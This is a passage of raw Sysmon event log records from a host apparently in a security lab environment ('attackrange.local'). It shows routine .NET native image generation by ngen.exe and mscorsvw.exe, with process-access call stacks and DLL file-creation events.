+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:08.359{59A5CD1D-915B-6005-5F02-00000000A301}3500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\dac-0\System.Data.Entity.Design.dll2021-01-18 13:47:08.359 10341000x80000000000000006598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:10.687{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-915E-6005-6302-00000000A301}880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:10.672{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-915E-6005-6302-00000000A301}880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:10.672{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-915E-6005-6302-00000000A301}880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:10.547{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-915E-6005-6202-00000000A301}4664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:10.531{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-915E-6005-6202-00000000A301}4664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:10.531{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-915E-6005-6202-00000000A301}4664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:10.406{59A5CD1D-915C-6005-6102-00000000A301}3664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\e50-0\System.Data.Linq.dll2021-01-18 13:47:10.406 10341000x80000000000000006605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:11.875{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-915F-6005-6502-00000000A301}3092C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:11.875{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-915F-6005-6502-00000000A301}3092C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:11.875{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-915F-6005-6502-00000000A301}3092C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:11.531{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-915F-6005-6402-00000000A301}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:11.531{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-915F-6005-6402-00000000A301}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:11.531{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-915F-6005-6402-00000000A301}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:11.437{59A5CD1D-915E-6005-6302-00000000A301}880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\370-0\System.Data.OracleClient.dll2021-01-18 13:47:11.437 10341000x80000000000000006612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:13.703{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9161-6005-6702-00000000A301}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:13.687{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9161-6005-6702-00000000A301}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:13.687{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9161-6005-6702-00000000A301}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:13.625{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9161-6005-6602-00000000A301}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:13.625{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9161-6005-6602-00000000A301}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:13.625{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9161-6005-6602-00000000A301}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:13.515{59A5CD1D-915F-6005-6502-00000000A301}3092C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c14-0\System.Data.Services.dll2021-01-18 13:47:13.515 10341000x80000000000000006618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:14.984{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9162-6005-6902-00000000A301}3080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:14.984{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9162-6005-6902-00000000A301}3080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:14.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9162-6005-6802-00000000A301}3784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:14.734{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9162-6005-6802-00000000A301}3784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:14.734{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9162-6005-6802-00000000A301}3784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:14.656{59A5CD1D-9161-6005-6702-00000000A301}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\120c-0\System.Data.Services.Client.dll2021-01-18 13:47:14.656 10341000x80000000000000006626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:15.672{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9163-6005-6B02-00000000A301}3184C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\n